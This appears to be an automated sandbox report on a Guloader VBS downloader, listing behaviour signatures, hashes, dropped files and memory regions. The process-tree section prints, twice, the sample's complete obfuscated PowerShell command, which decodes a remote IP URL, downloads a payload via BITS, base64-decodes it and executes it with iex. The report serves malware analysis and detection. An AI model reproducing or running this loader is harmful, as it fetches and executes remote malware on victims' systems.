Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
-
submitted
19-07-2023 07:25
General
-
Target
b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165.vbs
-
Size
19KB
-
MD5
f39329106b591529cc1d7e82f4cfbfa6
-
SHA1
52570f2a11da2c8b86d7228409b474ff8c434004
-
SHA256
b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165
-
SHA512
e9eb2ca939c99fd9ff8572c0c33f21f7d92409ba1e6874c91cd59970e2e7a04abb5870a3f1dc42a6e2f38c180dc272a7a925197008baf4df42dc3bca73708dbc
-
SSDEEP
384:51UbTY1Nzo40/XQwsLkhSA1IpoGW3RPtd3loWHWA3R0yRr:51UfUNzo4mXnSA1yoGW31dD0E
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8652df6cc90e3c90f1731725f76ea0bfc8cdbfabffbde1f80f01acd41d28165.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sawmo9 ([String]$Gaardmands){For($Myelauxefo=1; $Myelauxefo -lt $Gaardmands.Length-1; $Myelauxefo+=(1+1)){$Dryde0=$Dryde0+$Gaardmands.Substring($Myelauxefo, 1)};$Dryde0;}$Antndels=Sawmo9 'KhStmtUpR: /M/ 1R9G4O.A5S5A.B2 2 4M. 1 8B3S/Sf rAs h /VR eTmviCmIi cMrPaS.EhAh p ';$Dryde001=Sawmo9 ' i e xQ ';$Lnnesmini = Sawmo9 'P\AsRyFsWwMo w 6e4W\OWEiDn dUo wLsAPEoBw eGrRSShRe lflD\ vO1 .M0U\ psoLwTeMrIs h eElBlO.HePxde ';.($Dryde001) (Sawmo9 ' $SNAaMb o nBuFl p uU2R=B$Ue n vA:CwBiRn dGi rZ ') ;.($Dryde001) (Sawmo9 ' $ LKnAn eRs m i n i =S$AN aSb o nPuMl p ui2 +c$ LMnMnSebs m iPn iU ') ;.($Dryde001) (Sawmo9 ' $aSTaUm mDeKnPsT =E (P( g w mCiG TwDiWn 3r2 _Sp r o cHeKs s L-BFF HP r o cIeMs s IGdS= $R{rPCILDS}R) .TC otmSm aHnzdRL i noeA)E - sNp lSiPt F[ cOhSaEr ] 3R4S ');.($Dryde001) (Sawmo9 'A$BLHaJn d f sUtKeK = A$ S a m m e n sN[ $LSBa mKmOe nBsC. c oKuSnTt -S2 ] ');.($Dryde001) (Sawmo9 's$ASCp uLm eSd s 1A1D1 =G(UTSe s tP-PPiaFtAhN t$ L nRnTe sBm iVn i )A H- ASn dS C(d[CI nPt Pdt rN]S:L: ssiNzSe P-CeTqP 8D)a ') ;if ($Spumeds111) {.$Lnnesmini $Landfste;} else {;$Dryde000=Sawmo9 'FShtRaSrPtS- BGiCt sATmr aGnRsZfVeNr - S oFuRrscEed $ AVn tRnTd eBlFs H-PDRePsBt i nRaotSi oDn B$FN arbIo nCuDl pMu 2 ';.($Dryde001) (Sawmo9 't$FNUaFbAoSn uOl p uA2P= $ eAn vD:Aa p psd a tRaS ') ;.($Dryde001) (Sawmo9 ' ITm pFoBrGtG- MMo dBuhl e B i tSs T rNa nUsUfIe r ') ;$Nabonulpu2=$Nabonulpu2+'\Fasta.ski';while (-not $Feltoplys) {.($Dryde001) (Sawmo9 'F$KFBeAl t o p lEyNs = ( TAe s tR-GP aBtFhA K$ NUaSbFo n uNlCpJu 2O) ') ;.($Dryde001) $Dryde000;.($Dryde001) (Sawmo9 'SSAt aNrrt -gShl e e pn R5I ');}.($Dryde001) (Sawmo9 'F$BSKaLwEmAoP S= RG eBtF- C oBnOtIebnFts P$ NFaAbFoPn uPlopBuR2B ');.($Dryde001) (Sawmo9 'M$ BSlOuAeDb e R=B S[tSSy sPtkeGmG.CC oPn v ePrCt ]D:V: FrrUo mNBTaFs eU6 4HSItAr iSn g (e$CSTaCwAmMoS) ');.($Dryde001) (Sawmo9 'P$ D rSy dCeP0 2B =T O[ISUyAsAtDe m . T e xUt .RE n c oUdSiDnSgA]S: :FAKS C IAI .CG e t S tFrTi nGgs( $FBMlLuUe bTeb) ');.($Dryde001) (Sawmo9 ' $ c i v iUceiVsA= $HDrrEyAdDe 0N2S. sFu bTsCtSr iLn gS( 2 0U5A4V8S4G, 1 9S7S1 2F) ');.($Dryde001) $civicis;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sawmo9 ([String]$Gaardmands){For($Myelauxefo=1; $Myelauxefo -lt $Gaardmands.Length-1; $Myelauxefo+=(1+1)){$Dryde0=$Dryde0+$Gaardmands.Substring($Myelauxefo, 1)};$Dryde0;}$Antndels=Sawmo9 'KhStmtUpR: /M/ 1R9G4O.A5S5A.B2 2 4M. 1 8B3S/Sf rAs h /VR eTmviCmIi cMrPaS.EhAh p ';$Dryde001=Sawmo9 ' i e xQ ';$Lnnesmini = Sawmo9 'P\AsRyFsWwMo w 6e4W\OWEiDn dUo wLsAPEoBw eGrRSShRe lflD\ vO1 .M0U\ psoLwTeMrIs h eElBlO.HePxde ';.($Dryde001) (Sawmo9 ' $SNAaMb o nBuFl p uU2R=B$Ue n vA:CwBiRn dGi rZ ') ;.($Dryde001) (Sawmo9 ' $ LKnAn eRs m i n i =S$AN aSb o nPuMl p ui2 +c$ LMnMnSebs m iPn iU ') ;.($Dryde001) (Sawmo9 ' $aSTaUm mDeKnPsT =E (P( g w mCiG TwDiWn 3r2 _Sp r o cHeKs s L-BFF HP r o cIeMs s IGdS= $R{rPCILDS}R) .TC otmSm aHnzdRL i noeA)E - sNp lSiPt F[ cOhSaEr ] 3R4S ');.($Dryde001) (Sawmo9 'A$BLHaJn d f sUtKeK = A$ S a m m e n sN[ $LSBa mKmOe nBsC. c oKuSnTt -S2 ] ');.($Dryde001) (Sawmo9 's$ASCp uLm eSd s 1A1D1 =G(UTSe s tP-PPiaFtAhN t$ L nRnTe sBm iVn i )A H- ASn dS C(d[CI nPt Pdt rN]S:L: ssiNzSe P-CeTqP 8D)a ') ;if ($Spumeds111) {.$Lnnesmini $Landfste;} else {;$Dryde000=Sawmo9 'FShtRaSrPtS- BGiCt sATmr aGnRsZfVeNr - S oFuRrscEed $ AVn tRnTd eBlFs H-PDRePsBt i nRaotSi oDn B$FN arbIo nCuDl pMu 2 ';.($Dryde001) (Sawmo9 't$FNUaFbAoSn uOl p uA2P= $ eAn vD:Aa p psd a tRaS ') ;.($Dryde001) (Sawmo9 ' ITm pFoBrGtG- MMo dBuhl e B i tSs T rNa nUsUfIe r ') ;$Nabonulpu2=$Nabonulpu2+'\Fasta.ski';while (-not $Feltoplys) {.($Dryde001) (Sawmo9 'F$KFBeAl t o p lEyNs = ( TAe s tR-GP aBtFhA K$ NUaSbFo n uNlCpJu 2O) ') ;.($Dryde001) $Dryde000;.($Dryde001) (Sawmo9 'SSAt aNrrt -gShl e e pn R5I ');}.($Dryde001) (Sawmo9 'F$BSKaLwEmAoP S= RG eBtF- C oBnOtIebnFts P$ NFaAbFoPn uPlopBuR2B ');.($Dryde001) (Sawmo9 'M$ BSlOuAeDb e R=B S[tSSy sPtkeGmG.CC oPn v ePrCt ]D:V: FrrUo mNBTaFs eU6 4HSItAr iSn g (e$CSTaCwAmMoS) ');.($Dryde001) (Sawmo9 'P$ D rSy dCeP0 2B =T O[ISUyAsAtDe m . T e xUt .RE n c oUdSiDnSgA]S: :FAKS C IAI .CG e t S tFrTi nGgs( $FBMlLuUe bTeb) ');.($Dryde001) (Sawmo9 ' $ c i v iUceiVsA= $HDrrEyAdDe 0N2S. sFu bTsCtSr iLn gS( 2 0U5A4V8S4G, 1 9S7S1 2F) ');.($Dryde001) $civicis;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD51f59b9527b3d34c63b3e474fd3b68f73
SHA13213dcff76905b601aa0b82ba01d077f04a5b4ab
SHA256a310786ae7891031f6e3712ebc8bd9879e900c8ac0a116cef0a6767c8e9066d8
SHA5124fb59a2d9c21e190944cc9e035515fd0397255cbeabb2c831bbeed2ef3ef90eae87476dc23babddb3b37b426eee8060d88b57eccc93c411e62f61159b6351ce9
-
C:\Users\Admin\AppData\Local\Temp\Cab7BB7.tmpFilesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\Local\Temp\TarB28E.tmpFilesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9TAVMBFJGROL6LZ0F70J.tempFilesize
7KB
MD571217161b0962b5170444675a300fe07
SHA12b1c684e24ecd8c317ee0651b231a303208378a5
SHA2561c794bd66d1db795ce584762866e4667f3a10012338d678f23923644b5ef521e
SHA512ac976c64d03ca7793c8092588f602a178f6cc901cf3983b993555b25ef2cb499a2ca9a4aa70da765334139f0c020c9d59b9395cc2a7ae397dc22cf179302580b
-
memory/2304-77-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-78-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-79-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmpFilesize
9.6MB
-
memory/2304-80-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-81-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmpFilesize
9.6MB
-
memory/2304-83-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-82-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-84-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2304-76-0x0000000001ED0000-0x0000000001ED8000-memory.dmpFilesize
32KB
-
memory/2304-148-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmpFilesize
9.6MB
-
memory/2304-75-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmpFilesize
9.6MB
-
memory/2304-74-0x000000001B240000-0x000000001B522000-memory.dmpFilesize
2.9MB
-
memory/2304-90-0x00000000029E0000-0x0000000002A60000-memory.dmpFilesize
512KB
-
memory/2336-133-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-124-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-151-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-150-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-147-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-146-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-145-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-141-0x0000000000F60000-0x0000000002F24000-memory.dmpFilesize
31.8MB
-
memory/2336-137-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-140-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-139-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-111-0x0000000000F60000-0x0000000002F24000-memory.dmpFilesize
31.8MB
-
memory/2336-113-0x0000000000F60000-0x0000000002F24000-memory.dmpFilesize
31.8MB
-
memory/2336-114-0x0000000077740000-0x00000000778E9000-memory.dmpFilesize
1.7MB
-
memory/2336-115-0x0000000000F60000-0x0000000002F24000-memory.dmpFilesize
31.8MB
-
memory/2336-116-0x0000000000F60000-0x0000000002F24000-memory.dmpFilesize
31.8MB
-
memory/2336-117-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-118-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-119-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-120-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-121-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-122-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-123-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-138-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-125-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-127-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-128-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-129-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-130-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-131-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-132-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-136-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-134-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2336-135-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/2456-106-0x0000000006400000-0x00000000083C4000-memory.dmpFilesize
31.8MB
-
memory/2456-88-0x0000000073830000-0x0000000073DDB000-memory.dmpFilesize
5.7MB
-
memory/2456-110-0x0000000077930000-0x0000000077A06000-memory.dmpFilesize
856KB
-
memory/2456-109-0x0000000077740000-0x00000000778E9000-memory.dmpFilesize
1.7MB
-
memory/2456-108-0x0000000006400000-0x00000000083C4000-memory.dmpFilesize
31.8MB
-
memory/2456-142-0x00000000026B0000-0x00000000026F0000-memory.dmpFilesize
256KB
-
memory/2456-91-0x00000000026B0000-0x00000000026F0000-memory.dmpFilesize
256KB
-
memory/2456-143-0x0000000073830000-0x0000000073DDB000-memory.dmpFilesize
5.7MB
-
memory/2456-87-0x0000000073830000-0x0000000073DDB000-memory.dmpFilesize
5.7MB
-
memory/2456-104-0x0000000005B50000-0x0000000005B51000-memory.dmpFilesize
4KB
-
memory/2456-105-0x0000000006400000-0x00000000083C4000-memory.dmpFilesize
31.8MB
-
memory/2456-103-0x00000000026B0000-0x00000000026F0000-memory.dmpFilesize
256KB
-
memory/2456-102-0x0000000073830000-0x0000000073DDB000-memory.dmpFilesize
5.7MB
-
memory/2456-89-0x00000000026B0000-0x00000000026F0000-memory.dmpFilesize
256KB